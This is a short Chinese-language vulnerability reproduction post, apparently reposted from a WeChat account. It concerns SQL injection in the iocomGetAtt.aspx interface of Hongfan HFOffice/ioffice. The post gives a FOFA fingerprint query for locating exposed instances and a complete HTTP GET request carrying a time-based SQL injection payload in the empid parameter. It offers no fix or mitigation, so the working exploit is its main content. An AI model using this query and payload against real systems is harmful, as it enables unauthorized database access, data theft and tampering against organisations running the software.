红帆iocomgetatt接口存在SQL注入

 

漏洞描述

红帆HFOffice-iocomGetAtt接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。

资产测绘

FOFA：body="./config/pc-app-config.js" && title="HFOffice" || app="红帆-ioffice"

漏洞复现

GET /ioffice/prg/interface/iocomGetAtt.aspx?NewPdf=1&empid=1;WAITFOR+DELAY+%270:0:4%27-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
Connection: close
Cookie: ASP.NET_SessionId=qwgtdu45xljnlbmrqfzg1y45

 

原文始发于微信公众号（漏洞文库）：【漏洞复现】红帆iocomgetatt接口存在SQL注入